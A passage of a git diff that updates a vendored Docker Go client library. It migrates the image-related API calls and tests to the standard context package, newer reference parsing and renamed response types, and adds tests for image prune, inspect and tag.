(cli *Client) ImageHistory(ctx context.Context, imageID string) ([]types.ImageHistory, error) { - var history []types.ImageHistory +func (cli *Client) ImageHistory(ctx context.Context, imageID string) ([]image.HistoryResponseItem, error) { + var history []image.HistoryResponseItem serverResp, err := cli.get(ctx, "/images/"+imageID+"/history", url.Values{}, nil) if err != nil { return history, err diff --git a/vendor/github.com/docker/docker/client/image_history_test.go b/vendor/github.com/docker/docker/client/image_history_test.go index 729edb1ad5..0217bf575a 100644 --- a/vendor/github.com/docker/docker/client/image_history_test.go +++ b/vendor/github.com/docker/docker/client/image_history_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -9,8 +10,7 @@ import ( "strings" "testing" - "github.com/docker/docker/api/types" - "golang.org/x/net/context" + "github.com/docker/docker/api/types/image" ) func TestImageHistoryError(t *testing.T) { @@ -30,7 +30,7 @@ func TestImageHistory(t *testing.T) { if !strings.HasPrefix(r.URL.Path, expectedURL) { return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, r.URL) } - b, err := json.Marshal([]types.ImageHistory{ + b, err := json.Marshal([]image.HistoryResponseItem{ { ID: "image_id1", Tags: []string{"tag1", "tag2"}, diff --git a/vendor/github.com/docker/docker/client/image_import.go b/vendor/github.com/docker/docker/client/image_import.go index c6f154b249..c2972ea950 100644 --- a/vendor/github.com/docker/docker/client/image_import.go +++ b/vendor/github.com/docker/docker/client/image_import.go @@ -1,10 +1,10 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "io" "net/url" - - "golang.org/x/net/context" + "strings" "github.com/docker/distribution/reference" "github.com/docker/docker/api/types" @@ -15,7 +15,7 @@ import ( func (cli *Client) ImageImport(ctx context.Context, source types.ImageImportSource, ref string, options types.ImageImportOptions) (io.ReadCloser, error) { if ref != "" { //Check if the given image name can be resolved - if _, err := reference.ParseNamed(ref); err != nil { + if _, err := reference.ParseNormalizedNamed(ref); err != nil { return nil, err } } @@ -25,6 +25,9 @@ func (cli *Client) ImageImport(ctx context.Context, source types.ImageImportSour query.Set("repo", ref) query.Set("tag", options.Tag) query.Set("message", options.Message) + if options.Platform != "" { + query.Set("platform", strings.ToLower(options.Platform)) + } for _, change := range options.Changes { query.Add("changes", change) } diff --git a/vendor/github.com/docker/docker/client/image_import_test.go b/vendor/github.com/docker/docker/client/image_import_test.go index e309be74e6..944cd52fec 100644 --- a/vendor/github.com/docker/docker/client/image_import_test.go +++ b/vendor/github.com/docker/docker/client/image_import_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" @@ -10,7 +11,6 @@ import ( "testing" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) func TestImageImportError(t *testing.T) { @@ -37,7 +37,7 @@ func TestImageImport(t *testing.T) { } repo := query.Get("repo") if repo != "repository_name:imported" { - return nil, fmt.Errorf("repo not set in URL query properly. Expected 'repository_name', got %s", repo) + return nil, fmt.Errorf("repo not set in URL query properly. Expected 'repository_name:imported', got %s", repo) } tag := query.Get("tag") if tag != "imported" { diff --git a/vendor/github.com/docker/docker/client/image_inspect.go b/vendor/github.com/docker/docker/client/image_inspect.go index b3a64ce2f8..2f8f6d2f14 100644 --- a/vendor/github.com/docker/docker/client/image_inspect.go +++ b/vendor/github.com/docker/docker/client/image_inspect.go @@ -1,23 +1,22 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "io/ioutil" - "net/http" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // ImageInspectWithRaw returns the image information and its raw representation. func (cli *Client) ImageInspectWithRaw(ctx context.Context, imageID string) (types.ImageInspect, []byte, error) { + if imageID == "" { + return types.ImageInspect{}, nil, objectNotFoundError{object: "image", id: imageID} + } serverResp, err := cli.get(ctx, "/images/"+imageID+"/json", nil, nil) if err != nil { - if serverResp.statusCode == http.StatusNotFound { - return types.ImageInspect{}, nil, imageNotFoundError{imageID} - } - return types.ImageInspect{}, nil, err + return types.ImageInspect{}, nil, wrapResponseError(err, serverResp, "image", imageID) } defer ensureReaderClosed(serverResp) diff --git a/vendor/github.com/docker/docker/client/image_inspect_test.go b/vendor/github.com/docker/docker/client/image_inspect_test.go index 74a4e49805..a910872d1c 100644 --- a/vendor/github.com/docker/docker/client/image_inspect_test.go +++ b/vendor/github.com/docker/docker/client/image_inspect_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -11,7 +12,7 @@ import ( "testing" "github.com/docker/docker/api/types" - "golang.org/x/net/context" + "github.com/pkg/errors" ) func TestImageInspectError(t *testing.T) { @@ -31,11 +32,23 @@ func TestImageInspectImageNotFound(t *testing.T) { } _, _, err := client.ImageInspectWithRaw(context.Background(), "unknown") - if err == nil || !IsErrImageNotFound(err) { + if err == nil || !IsErrNotFound(err) { t.Fatalf("expected an imageNotFound error, got %v", err) } } +func TestImageInspectWithEmptyID(t *testing.T) { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + return nil, errors.New("should not make request") + }), + } + _, _, err := client.ImageInspectWithRaw(context.Background(), "") + if !IsErrNotFound(err) { + t.Fatalf("Expected NotFoundError, got %v", err) + } +} + func TestImageInspect(t *testing.T) { expectedURL := "/images/image_id/json" expectedTags := []string{"tag1", "tag2"} diff --git a/vendor/github.com/docker/docker/client/image_list.go b/vendor/github.com/docker/docker/client/image_list.go index f26464f67c..32fae27b37 100644 --- a/vendor/github.com/docker/docker/client/image_list.go +++ b/vendor/github.com/docker/docker/client/image_list.go @@ -1,13 +1,13 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "net/url" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" "github.com/docker/docker/api/types/versions" - "golang.org/x/net/context" ) // ImageList returns a list of images in the docker host. diff --git a/vendor/github.com/docker/docker/client/image_list_test.go b/vendor/github.com/docker/docker/client/image_list_test.go index 7c4a46414d..3ba5239a53 100644 --- a/vendor/github.com/docker/docker/client/image_list_test.go +++ b/vendor/github.com/docker/docker/client/image_list_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -11,7 +12,6 @@ import ( "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" - "golang.org/x/net/context" ) func TestImageListError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/image_load.go b/vendor/github.com/docker/docker/client/image_load.go index 77aaf1af36..91016e493c 100644 --- a/vendor/github.com/docker/docker/client/image_load.go +++ b/vendor/github.com/docker/docker/client/image_load.go @@ -1,11 +1,10 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "io" "net/url" - "golang.org/x/net/context" - "github.com/docker/docker/api/types" ) diff --git a/vendor/github.com/docker/docker/client/image_load_test.go b/vendor/github.com/docker/docker/client/image_load_test.go index 68dc14ff22..116317da75 100644 --- a/vendor/github.com/docker/docker/client/image_load_test.go +++ b/vendor/github.com/docker/docker/client/image_load_test.go @@ -1,14 +1,13 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - - "golang.org/x/net/context" ) func TestImageLoadError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/image_prune.go b/vendor/github.com/docker/docker/client/image_prune.go index 5ef98b7f02..78ee3f6c49 100644 --- a/vendor/github.com/docker/docker/client/image_prune.go +++ b/vendor/github.com/docker/docker/client/image_prune.go @@ -1,12 +1,12 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "fmt" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" - "golang.org/x/net/context" ) // ImagesPrune requests the daemon to delete unused data diff --git a/vendor/github.com/docker/docker/client/image_prune_test.go b/vendor/github.com/docker/docker/client/image_prune_test.go new file mode 100644 index 0000000000..9b0839bb6c --- /dev/null +++ b/vendor/github.com/docker/docker/client/image_prune_test.go @@ -0,0 +1,120 @@ +package client // import "github.com/docker/docker/client" + +import ( + "bytes" + "context" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" +) + +func TestImagesPruneError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + version: "1.25", + } + + filters := filters.NewArgs() + + _, err := client.ImagesPrune(context.Background(), filters) + assert.Check(t, is.Error(err, "Error response from daemon: Server error")) +} + +func TestImagesPrune(t *testing.T) { + expectedURL := "/v1.25/images/prune" + + danglingFilters := filters.NewArgs() + danglingFilters.Add("dangling", "true") + + noDanglingFilters := filters.NewArgs() + noDanglingFilters.Add("dangling", "false") + + labelFilters := filters.NewArgs() + labelFilters.Add("dangling", "true") + labelFilters.Add("label", "label1=foo") + labelFilters.Add("label", "label2!=bar") + + listCases := []struct { + filters filters.Args + expectedQueryParams map[string]string + }{ + { + filters: filters.Args{}, + expectedQueryParams: map[string]string{ + "until": "", + "filter": "", + "filters": "", + }, + }, + { + filters: danglingFilters, + expectedQueryParams: map[string]string{ + "until": "", + "filter": "", + "filters": `{"dangling":{"true":true}}`, + }, + }, + { + filters: noDanglingFilters, + expectedQueryParams: map[string]string{ + "until": "", + "filter": "", + "filters": `{"dangling":{"false":true}}`, + }, + }, + { + filters: labelFilters, + expectedQueryParams: map[string]string{ + "until": "", + "filter": "", + "filters": `{"dangling":{"true":true},"label":{"label1=foo":true,"label2!=bar":true}}`, + }, + }, + } + for _, listCase := range listCases { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + query := req.URL.Query() + for key, expected := range listCase.expectedQueryParams { + actual := query.Get(key) + assert.Check(t, is.Equal(expected, actual)) + } + content, err := json.Marshal(types.ImagesPruneReport{ + ImagesDeleted: []types.ImageDeleteResponseItem{ + { + Deleted: "image_id1", + }, + { + Deleted: "image_id2", + }, + }, + SpaceReclaimed: 9999, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + version: "1.25", + } + + report, err := client.ImagesPrune(context.Background(), listCase.filters) + assert.Check(t, err) + assert.Check(t, is.Len(report.ImagesDeleted, 2)) + assert.Check(t, is.Equal(uint64(9999), report.SpaceReclaimed)) + } +} diff --git a/vendor/github.com/docker/docker/client/image_pull.go b/vendor/github.com/docker/docker/client/image_pull.go index 3bffdb70e8..d97aacf8c5 100644 --- a/vendor/github.com/docker/docker/client/image_pull.go +++ b/vendor/github.com/docker/docker/client/image_pull.go @@ -1,14 +1,14 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "io" "net/http" "net/url" + "strings" - "golang.org/x/net/context" - + "github.com/docker/distribution/reference" "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/reference" ) // ImagePull requests the docker host to pull an image from a remote registry. @@ -19,16 +19,19 @@ import ( // FIXME(vdemeester): there is currently used in a few way in docker/docker // - if not in trusted content, ref is used to pass the whole reference, and tag is empty // - if in trusted content, ref is used to pass the reference name, and tag for the digest -func (cli *Client) ImagePull(ctx context.Context, ref string, options types.ImagePullOptions) (io.ReadCloser, error) { - repository, tag, err := reference.Parse(ref) +func (cli *Client) ImagePull(ctx context.Context, refStr string, options types.ImagePullOptions) (io.ReadCloser, error) { + ref, err := reference.ParseNormalizedNamed(refStr) if err != nil { return nil, err } query := url.Values{} - query.Set("fromImage", repository) - if tag != "" && !options.All { - query.Set("tag", tag) + query.Set("fromImage", reference.FamiliarName(ref)) + if !options.All { + query.Set("tag", getAPITagFromNamedRef(ref)) + } + if options.Platform != "" { + query.Set("platform", strings.ToLower(options.Platform)) } resp, err := cli.tryImageCreate(ctx, query, options.RegistryAuth) @@ -44,3 +47,18 @@ func (cli *Client) ImagePull(ctx context.Context, ref string, options types.Imag } return resp.body, nil } + +// getAPITagFromNamedRef returns a tag from the specified reference. +// This function is necessary as long as the docker "server" api expects +// digests to be sent as tags and makes a distinction between the name +// and tag/digest part of a reference. +func getAPITagFromNamedRef(ref reference.Named) string { + if digested, ok := ref.(reference.Digested); ok { + return digested.Digest().String() + } + ref = reference.TagNameOnly(ref) + if tagged, ok := ref.(reference.Tagged); ok { + return tagged.Tag() + } + return "" +} diff --git a/vendor/github.com/docker/docker/client/image_pull_test.go b/vendor/github.com/docker/docker/client/image_pull_test.go index fe6bafed97..361c5c2be3 100644 --- a/vendor/github.com/docker/docker/client/image_pull_test.go +++ b/vendor/github.com/docker/docker/client/image_pull_test.go @@ -1,15 +1,14 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - "golang.org/x/net/context" - "github.com/docker/docker/api/types" ) @@ -21,7 +20,7 @@ func TestImagePullReferenceParseError(t *testing.T) { } // An empty reference is an invalid reference _, err := client.ImagePull(context.Background(), "", types.ImagePullOptions{}) - if err == nil || err.Error() != "repository name must have at least one component" { + if err == nil || !strings.Contains(err.Error(), "invalid reference format") { t.Fatalf("expected an error, got %v", err) } } diff --git a/vendor/github.com/docker/docker/client/image_push.go b/vendor/github.com/docker/docker/client/image_push.go index 8e73d28f56..a15871c2b4 100644 --- a/vendor/github.com/docker/docker/client/image_push.go +++ b/vendor/github.com/docker/docker/client/image_push.go @@ -1,14 +1,13 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "errors" "io" "net/http" "net/url" - "golang.org/x/net/context" - - distreference "github.com/docker/distribution/reference" + "github.com/docker/distribution/reference" "github.com/docker/docker/api/types" ) @@ -16,31 +15,33 @@ import ( // It executes the privileged function if the operation is unauthorized // and it tries one more time. // It's up to the caller to handle the io.ReadCloser and close it properly. -func (cli *Client) ImagePush(ctx context.Context, ref string, options types.ImagePushOptions) (io.ReadCloser, error) { - distributionRef, err := distreference.ParseNamed(ref) +func (cli *Client) ImagePush(ctx context.Context, image string, options types.ImagePushOptions) (io.ReadCloser, error) { + ref, err := reference.ParseNormalizedNamed(image) if err != nil { return nil, err } - if _, isCanonical := distributionRef.(distreference.Canonical); isCanonical { + if _, isCanonical := ref.(reference.Canonical); isCanonical { return nil, errors.New("cannot push a digest reference") } - var tag = "" - if nameTaggedRef, isNamedTagged := distributionRef.(distreference.NamedTagged); isNamedTagged { + tag := "" + name := reference.FamiliarName(ref) + + if nameTaggedRef, isNamedTagged := ref.(reference.NamedTagged); isNamedTagged { tag = nameTaggedRef.Tag() } query := url.Values{} query.Set("tag", tag) - resp, err := cli.tryImagePush(ctx, distributionRef.Name(), query, options.RegistryAuth) + resp, err := cli.tryImagePush(ctx, name, query, options.RegistryAuth) if resp.statusCode == http.StatusUnauthorized && options.PrivilegeFunc != nil { newAuthHeader, privilegeErr := options.PrivilegeFunc() if privilegeErr != nil { return nil, privilegeErr } - resp, err = cli.tryImagePush(ctx, distributionRef.Name(), query, newAuthHeader) + resp, err = cli.tryImagePush(ctx, name, query, newAuthHeader) } if err != nil { return nil, err diff --git a/vendor/github.com/docker/docker/client/image_push_test.go b/vendor/github.com/docker/docker/client/image_push_test.go index b52da8b8dc..0693601af1 100644 --- a/vendor/github.com/docker/docker/client/image_push_test.go +++ b/vendor/github.com/docker/docker/client/image_push_test.go @@ -1,15 +1,14 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - "golang.org/x/net/context" - "github.com/docker/docker/api/types" ) @@ -21,7 +20,7 @@ func TestImagePushReferenceError(t *testing.T) { } // An empty reference is an invalid reference _, err := client.ImagePush(context.Background(), "", types.ImagePushOptions{}) - if err == nil || err.Error() != "repository name must have at least one component" { + if err == nil || !strings.Contains(err.Error(), "invalid reference format") { t.Fatalf("expected an error, got %v", err) } // An canonical reference cannot be pushed diff --git a/vendor/github.com/docker/docker/client/image_remove.go b/vendor/github.com/docker/docker/client/image_remove.go index 839e5311c4..45d6e6f0db 100644 --- a/vendor/github.com/docker/docker/client/image_remove.go +++ b/vendor/github.com/docker/docker/client/image_remove.go @@ -1,15 +1,15 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "net/url" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // ImageRemove removes an image from the docker host. -func (cli *Client) ImageRemove(ctx context.Context, imageID string, options types.ImageRemoveOptions) ([]types.ImageDelete, error) { +func (cli *Client) ImageRemove(ctx context.Context, imageID string, options types.ImageRemoveOptions) ([]types.ImageDeleteResponseItem, error) { query := url.Values{} if options.Force { @@ -19,12 +19,12 @@ func (cli *Client) ImageRemove(ctx context.Context, imageID string, options type query.Set("noprune", "1") } + var dels []types.ImageDeleteResponseItem resp, err := cli.delete(ctx, "/images/"+imageID, query, nil) if err != nil { - return nil, err + return dels, wrapResponseError(err, resp, "image", imageID) } - var dels []types.ImageDelete err = json.NewDecoder(resp.body).Decode(&dels) ensureReaderClosed(resp) return dels, err diff --git a/vendor/github.com/docker/docker/client/image_remove_test.go b/vendor/github.com/docker/docker/client/image_remove_test.go index 7b004f70e6..acc6bc9177 100644 --- a/vendor/github.com/docker/docker/client/image_remove_test.go +++ b/vendor/github.com/docker/docker/client/image_remove_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -10,7 +11,8 @@ import ( "testing" "github.com/docker/docker/api/types" - "golang.org/x/net/context" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) func TestImageRemoveError(t *testing.T) { @@ -19,9 +21,17 @@ func TestImageRemoveError(t *testing.T) { } _, err := client.ImageRemove(context.Background(), "image_id", types.ImageRemoveOptions{}) - if err == nil || err.Error() != "Error response from daemon: Server error" { - t.Fatalf("expected a Server Error, got %v", err) + assert.Check(t, is.Error(err, "Error response from daemon: Server error")) +} + +func TestImageRemoveImageNotFound(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusNotFound, "missing")), } + + _, err := client.ImageRemove(context.Background(), "unknown", types.ImageRemoveOptions{}) + assert.Check(t, is.Error(err, "Error: No such image: unknown")) + assert.Check(t, IsErrNotFound(err)) } func TestImageRemove(t *testing.T) { @@ -63,7 +73,7 @@ func TestImageRemove(t *testing.T) { return nil, fmt.Errorf("%s not set in URL query properly. Expected '%s', got %s", key, expected, actual) } } - b, err := json.Marshal([]types.ImageDelete{ + b, err := json.Marshal([]types.ImageDeleteResponseItem{ { Untagged: "image_id1", }, diff --git a/vendor/github.com/docker/docker/client/image_save.go b/vendor/github.com/docker/docker/client/image_save.go index ecac880a32..d1314e4b22 100644 --- a/vendor/github.com/docker/docker/client/image_save.go +++ b/vendor/github.com/docker/docker/client/image_save.go @@ -1,10 +1,9 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "io" "net/url" - - "golang.org/x/net/context" ) // ImageSave retrieves one or more images from the docker host as an io.ReadCloser. diff --git a/vendor/github.com/docker/docker/client/image_save_test.go b/vendor/github.com/docker/docker/client/image_save_test.go index 8f0cf88640..a40055e583 100644 --- a/vendor/github.com/docker/docker/client/image_save_test.go +++ b/vendor/github.com/docker/docker/client/image_save_test.go @@ -1,16 +1,14 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "reflect" - "testing" - - "golang.org/x/net/context" - "strings" + "testing" ) func TestImageSaveError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/image_search.go b/vendor/github.com/docker/docker/client/image_search.go index b0fcd5c23d..176de3c582 100644 --- a/vendor/github.com/docker/docker/client/image_search.go +++ b/vendor/github.com/docker/docker/client/image_search.go @@ -1,6 +1,7 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "fmt" "net/http" @@ -9,7 +10,6 @@ import ( "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" "github.com/docker/docker/api/types/registry" - "golang.org/x/net/context" ) // ImageSearch makes the docker host to search by a term in a remote registry. @@ -21,7 +21,7 @@ func (cli *Client) ImageSearch(ctx context.Context, term string, options types.I query.Set("limit", fmt.Sprintf("%d", options.Limit)) if options.Filters.Len() > 0 { - filterJSON, err := filters.ToParam(options.Filters) + filterJSON, err := filters.ToJSON(options.Filters) if err != nil { return results, err } diff --git a/vendor/github.com/docker/docker/client/image_search_test.go b/vendor/github.com/docker/docker/client/image_search_test.go index b17bbd8343..1456cd606f 100644 --- a/vendor/github.com/docker/docker/client/image_search_test.go +++ b/vendor/github.com/docker/docker/client/image_search_test.go @@ -1,16 +1,15 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" + "encoding/json" "fmt" "io/ioutil" "net/http" "strings" "testing" - "golang.org/x/net/context" - - "encoding/json" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/filters" "github.com/docker/docker/api/types/registry" diff --git a/vendor/github.com/docker/docker/client/image_tag.go b/vendor/github.com/docker/docker/client/image_tag.go index bdbf94add2..5652bfc252 100644 --- a/vendor/github.com/docker/docker/client/image_tag.go +++ b/vendor/github.com/docker/docker/client/image_tag.go @@ -1,34 +1,37 @@ -package client +package client // import "github.com/docker/docker/client" import ( - "errors" - "fmt" + "context" "net/url" - "golang.org/x/net/context" - - distreference "github.com/docker/distribution/reference" - "github.com/docker/docker/api/types/reference" + "github.com/docker/distribution/reference" + "github.com/pkg/errors" ) // ImageTag tags an image in the docker host -func (cli *Client) ImageTag(ctx context.Context, imageID, ref string) error { - distributionRef, err := distreference.ParseNamed(ref) +func (cli *Client) ImageTag(ctx context.Context, source, target string) error { + if _, err := reference.ParseAnyReference(source); err != nil { + return errors.Wrapf(err, "Error parsing reference: %q is not a valid repository/tag", source) + } + + ref, err := reference.ParseNormalizedNamed(target) if err != nil { - return fmt.Errorf("Error parsing reference: %q is not a valid repository/tag", ref) + return errors.Wrapf(err, "Error parsing reference: %q is not a valid repository/tag", target) } - if _, isCanonical := distributionRef.(distreference.Canonical); isCanonical { + if _, isCanonical := ref.(reference.Canonical); isCanonical { return errors.New("refusing to create a tag with a digest reference") } - tag := reference.GetTagFromNamedRef(distributionRef) + ref = reference.TagNameOnly(ref) query := url.Values{} - query.Set("repo", distributionRef.Name()) - query.Set("tag", tag) + query.Set("repo", reference.FamiliarName(ref)) + if tagged, ok := ref.(reference.Tagged); ok { + query.Set("tag", tagged.Tag()) + } - resp, err := cli.post(ctx, "/images/"+imageID+"/tag", query, nil, nil) + resp, err := cli.post(ctx, "/images/"+source+"/tag", query, nil, nil) ensureReaderClosed(resp) return err } diff --git a/vendor/github.com/docker/docker/client/image_tag_test.go b/vendor/github.com/docker/docker/client/image_tag_test.go index 7925db9f1b..2923bb995b 100644 --- a/vendor/github.com/docker/docker/client/image_tag_test.go +++ b/vendor/github.com/docker/docker/client/image_tag_test.go @@ -1,14 +1,13 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "fmt" "io/ioutil" "net/http" "strings" "testing" - - "golang.org/x/net/context" ) func TestImageTagError(t *testing.T) { @@ -22,7 +21,7 @@ func TestImageTagError(t *testing.T) { } } -// Note: this is not testing all the InvalidReference as it's the reponsability +// Note: this is not testing all the InvalidReference as it's the responsibility // of distribution/reference package. func TestImageTagInvalidReference(t *testing.T) { client := &Client{ @@ -30,11 +29,33 @@ func TestImageTagInvalidReference(t *testing.T) { } err := client.ImageTag(context.Background(), "image_id", "aa/asdf$$^/aa") - if err == nil || err.Error() != `Error parsing reference: "aa/asdf$$^/aa" is not a valid repository/tag` { + if err == nil || err.Error() != `Error parsing reference: "aa/asdf$$^/aa" is not a valid repository/tag: invalid reference format` { t.Fatalf("expected ErrReferenceInvalidFormat, got %v", err) } } +func TestImageTagInvalidSourceImageName(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.ImageTag(context.Background(), "invalid_source_image_name_", "repo:tag") + if err == nil || err.Error() != "Error parsing reference: \"invalid_source_image_name_\" is not a valid repository/tag: invalid reference format" { + t.Fatalf("expected Parsing Reference Error, got %v", err) + } +} + +func TestImageTagHexSource(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusOK, "OK")), + } + + err := client.ImageTag(context.Background(), "0d409d33b27e47423b049f7f863faa08655a8c901749c2b25b93ca67d01a470d", "repo:tag") + if err != nil { + t.Fatalf("got error: %v", err) + } +} + func TestImageTag(t *testing.T) { expectedURL := "/images/image_id/tag" tagCases := []struct { diff --git a/vendor/github.com/docker/docker/client/info.go b/vendor/github.com/docker/docker/client/info.go index ac07961224..121f256ab1 100644 --- a/vendor/github.com/docker/docker/client/info.go +++ b/vendor/github.com/docker/docker/client/info.go @@ -1,12 +1,12 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "encoding/json" "fmt" "net/url" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) // Info returns information about the docker server. diff --git a/vendor/github.com/docker/docker/client/info_test.go b/vendor/github.com/docker/docker/client/info_test.go index 79f23c8af2..866d8e8849 100644 --- a/vendor/github.com/docker/docker/client/info_test.go +++ b/vendor/github.com/docker/docker/client/info_test.go @@ -1,7 +1,8 @@ -package client +package client // import "github.com/docker/docker/client" import ( "bytes" + "context" "encoding/json" "fmt" "io/ioutil" @@ -10,7 +11,6 @@ import ( "testing" "github.com/docker/docker/api/types" - "golang.org/x/net/context" ) func TestInfoServerError(t *testing.T) { diff --git a/vendor/github.com/docker/docker/client/interface.go b/vendor/github.com/docker/docker/client/interface.go index 05978039b7..9250c468a6 100644 --- a/vendor/github.com/docker/docker/client/interface.go +++ b/vendor/github.com/docker/docker/client/interface.go @@ -1,23 +1,28 @@ -package client +package client // import "github.com/docker/docker/client" import ( + "context" "io" + "net" + "net/http" "time" "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/container" + containertypes "github.com/docker/docker/api/types/container" "github.com/docker/docker/api/types/events" "github.com/docker/docker/api/types/filters" - "github.com/docker/docker/api/types/network" + "github.com/docker/docker/api/types/image" + networktypes "github.com/docker/docker/api/types/network" "github.com/docker/docker/api/types/registry" "github.com/docker/docker/api/types/swarm" volumetypes "github.com/docker/docker/api/types/volume" - "golang.org/x/net/context" ) // CommonAPIClient is the common methods between stable and experimental versions of APIClient. type CommonAPIClient interface { + ConfigAPIClient ContainerAPIClient + DistributionAPIClient ImageAPIClient NodeAPIClient NetworkAPIClient @@ -28,17 +33,22 @@ type CommonAPIClient interface { SystemAPIClient VolumeAPIClient ClientVersion() string + DaemonHost() string + HTTPClient() *http.Client ServerVersion(ctx context.Context) (types.Version, error) - UpdateClientVersion(v string) + NegotiateAPIVersion(ctx context.Context) + NegotiateAPIVersionPing(types.Ping) + DialSession(ctx context.Context, proto string, meta map[string][]string) (net.Conn, error) + Close() error } // ContainerAPIClient defines API client methods for the containers type ContainerAPIClient interface { ContainerAttach(ctx context.Context, container string, options types.ContainerAttachOptions) (types.HijackedResponse, error) ContainerCommit(ctx context.Context, container string, options types.ContainerCommitOptions) (types.IDResponse, error) - ContainerCreate(ctx context.Context, config *container.Config, hostConfig *container.HostConfig, networkingConfig *network.NetworkingConfig, containerName string) (container.ContainerCreateCreatedBody, error) - ContainerDiff(ctx context.Context, container string) ([]types.ContainerChange, error) - ContainerExecAttach(ctx context.Context, execID string, config types.ExecConfig) (types.HijackedResponse, error) + ContainerCreate(ctx context.Context, config *containertypes.Config, hostConfig *containertypes.HostConfig, networkingConfig *networktypes.NetworkingConfig, containerName string) (containertypes.ContainerCreateCreatedBody, error) + ContainerDiff(ctx context.Context, container string) ([]containertypes.ContainerChangeResponseItem, error) + ContainerExecAttach(ctx context.Context, execID string, config types.ExecStartCheck) (types.HijackedResponse, error) ContainerExecCreate(ctx context.Context, container string, config types.ExecConfig) (types.IDResponse, error) ContainerExecInspect(ctx context.Context, execID string) (types.ContainerExecInspect, error) ContainerExecResize(ctx context.Context, execID string, options types.ResizeOptions) error @@ -58,27 +68,34 @@ type ContainerAPIClient interface { ContainerStats(ctx context.Context, container string, stream bool) (types.ContainerStats, error) ContainerStart(ctx context.Context, container string, options types.ContainerStartOptions) error ContainerStop(ctx context.Context, container string, timeout *time.Duration) error - ContainerTop(ctx context.Context, container string, arguments []string) (types.ContainerProcessList, error) + ContainerTop(ctx context.Context, container string, arguments []string) (containertypes.ContainerTopOKBody, error) ContainerUnpause(ctx context.Context, container string) error - ContainerUpdate(ctx context.Context, container string, updateConfig container.UpdateConfig) (container.ContainerUpdateOKBody, error) - ContainerWait(ctx context.Context, container string) (int64, error) + ContainerUpdate(ctx context.Context, container string, updateConfig containertypes.UpdateConfig) (containertypes.ContainerUpdateOKBody, error) + ContainerWait(ctx context.Context, container string, condition containertypes.WaitCondition) (<-chan containertypes.ContainerWaitOKBody, <-chan error) CopyFromContainer(ctx context.Context, container, srcPath string) (io.ReadCloser, types.ContainerPathStat, error) CopyToContainer(ctx context.Context, container, path string, content io.Reader, options types.CopyToContainerOptions) error ContainersPrune(ctx context.Context, pruneFilters filters.Args) (types.ContainersPruneReport, error) } +// DistributionAPIClient defines API client methods for the registry +type DistributionAPIClient interface { + DistributionInspect(ctx context.Context, image, encodedRegistryAuth string) (registry.DistributionInspect, error) +} + // ImageAPIClient defines API client methods for the images type ImageAPIClient interface { ImageBuild(ctx context.Context, context io.Reader, options types.ImageBuildOptions) (types.ImageBuildResponse, error) + BuildCachePrune(ctx context.Context) 